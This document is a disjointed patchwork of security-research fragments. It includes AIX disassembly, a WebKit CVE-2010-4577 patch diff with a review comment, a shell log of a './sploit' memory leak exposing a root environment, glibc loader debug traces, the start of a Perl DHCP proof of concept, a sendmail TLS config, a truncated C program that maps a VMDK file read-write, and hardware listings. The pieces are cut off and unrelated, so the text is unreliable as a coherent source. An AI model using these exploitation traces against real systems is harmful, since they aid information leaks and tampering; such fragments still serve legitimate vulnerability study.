.text:10000354 .using unk_30000BB4, %r31
.text:10000354 stw %r3, 0x110+var_28(%sp)
.text:10000358 addi %r3, %r31, 0x48C # a_dbgcmd_lquery # "_DBGCMD_LQUERYLV"
.text:1000035C bl .getenv
.text:10000360 lwz %rtoc, 0x110+saved_toc(%sp)
.text:10000364 lwz %r29, off_30001568 # dword_300015E4
.text:10000368 .using dword_300015E4, %r29
.text:10000368 cmpwi %r3, 0
.text:1000036C bne loc_100006D0
CVE-2010-4577
Red Hat - https://bugs.webkit.org/show_bug.cgi?id=49883 / http://trac.webkit.org/changeset/72685
Bug report inaccessible but changeset:
CSSParserValueList* args = val->function->args.get(); | |
3632 3632 if (args && args->size() == 1) { | |
3633 if (equalIgnoringCase(val->function->name, "local(") && !expectComma) { | |
3633 if (equalIgnoringCase(val->function->name, "local(") && !expectComma && (args->current()->unit == CSSPrimitiveValue::CSS_STRING || args->current()->unit == CSSPrimitiveValue::CSS_IDENT)) { |
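Review bot: the new condition on line 3633 calls args->current() twice inside an already long expression, and nothing next to it says why only CSS_STRING and CSS_IDENT arguments are accepted for "local(". Hoisting args->current() into a local before the if, and adding a one-line comment that other unit types must not reach the local() font-source path, would make the restriction easier to read and harder to drop by accident in a later refactor.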
$ id
uid=208(tmb) gid=1(staff)
$ ./sploit 1000000 -1
maxiumumleak: 1000000
target: 17760424
$031097N 04j0a06000000000I404d0Qa109>f086f0801(0000:/05d01005=9dfff0xf6f00deh0000/usr/java5/binLC_ALL=CLC__FASTMSG=trueLOGNAME=rootLOCPATH=/usr/lib/nls/locODMPATH=/etc/objrepos:LDR_CNTRL=MAXDATA=0x80000000USER=rootAUTHSTATE=compatSHELL=/usr/bin/kshODMDIR=/etc/objreposHOME=/TERM=dumbPWD=/TZ=GMT0BSTNLSPATH=/usr/lib/nls/msg/%L/%N:/usr/lib/nls/msg/%L/%N.catLIBPATH=/usr/java14/jre/bin:/usr/java14/jre/bin/classic:/usr/java5/jre/bin:/usr/java5/jre/bin/classic: |
$ LD_LIBRARY_PATH=unqualified:/qualified: SLEEP=0 ../glibc-2.19/build-tree/amd64-libc/elf/ld.so ./test-dlopen-LD_LIBRARY_PATH
10030: [+] operating on non setuid binary
10030: [+] being opened via LD_LIBRARY_PATH
10030: [+] not marked insecure=unqualified/
10030: [+] not fully qualified, marking insecure=unqualified/ (via LD_LIBRARY_PATH)
10030: [+] operating on non setuid binary
10030: [+] being opened via LD_LIBRARY_PATH
10030: [+] not marked insecure=unqualified/
10030: [+] not fully qualified, marking insecure=unqualified/ (via LD_LIBRARY_PATH)
10030: [+] operating on non setuid binary
$ LD_LIBRARY_PATH=/test ../glibc-2.19/build-tree/amd64-libc/elf/ld.so ./test-dlopen-LD_LIBRARY_PATH
$ LD_LIBRARY_PATH=test ../glibc-2.19/build-tree/amd64-libc/elf/ld.so ./test-dlopen-LD_LIBRARY_PATH
19635: not fully qualified, marking insecure=test/
19635: not fully qualified, marking insecure=test/
19635: not fully qualified, marking insecure=test/
19635: not fully qualified, marking insecure=test/
#!/usr/bin/perl
# largely purloined from http://www.perlmonks.org/?node_id=1093916 as my PoC for the old options overflow proved too messy^wPerlish to rework - [machine]
use strict;
use IO::Socket;
use Net::DHCP::Packet;
use Net::DHCP::Constants;
my $serveripaddress = "10.10.10.1";
+ usb0 IPv6 Invoke_AD4E4603568803A4 _bp2p._tcp local
+ usb0 IPv6 Friendly_F034C06D29A99B20_0AB96FC3A2E87129 _bp2p._tcp local
+ usb0 IPv4 Invoke_AD4E4603568803A4 _bp2p._tcp local
+ usb0 IPv4 Friendly_F034C06D29A99B20_0AB96FC3A2E87129 _bp2p._tcp local
+ usb0 IPv6 24EF7DCD11803ADA9573A4E61C4C02 _tunnel._tcp local
+ usb0 IPv4 24EF7DCD11803ADA9573A4E61C4C02 _tunnel._tcp local
Taken from http://www.michaelm.info/blog/?p=1256:
LOCAL_CONFIG
O ServerSSLOptions=+SSL_OP_NO_SSLv2 +SSL_OP_NO_SSLv3 +SSL_OP_CIPHER_SERVER_PREFERENCE
O ClientSSLOptions=+SSL_OP_NO_SSLv2 +SSL_OP_NO_SSLv3 +SSL_OP_CIPHER_SERVER_PREFERENCE
O CipherList=EDH+CAMELLIA:EDH+aRSA:EECDH+aRSA+AESGCM:EECDH+aRSA+SHA384:EECDH+aRSA+SHA256:EECDH:+CAMELLIA256:+AES256:+CAMELLIA128:+AES128:+SSLv3:!aNULL:!eNULL:!LOW:!3DES:!MD5:!EXP:!PSK:!DSS:!RC4:!SEED:!ECDSA:CAMELLIA256-SHA:AES256-SHA:CAMELLIA128-SHA:AES128-SHA
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <stdio.h>
int main(int argc, char **argv) {
    int filehandle;
    char *mmapbuffer;
    /* open the VMDK read-write and map its first 4096 bytes as shared memory */
    filehandle = open("sarpedon-000002.vmdk", O_RDWR);
    mmapbuffer = mmap(0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED, filehandle, 0);
...
description: Computer
product: Google Compute Engine ()
vendor: Google
serial: GoogleCloud-<hex>
width: 64 bits
capabilities: smbios-2.4 dmi-2.4 vsyscall32
configuration: boot=normal uuid=<uuid>
...
*-core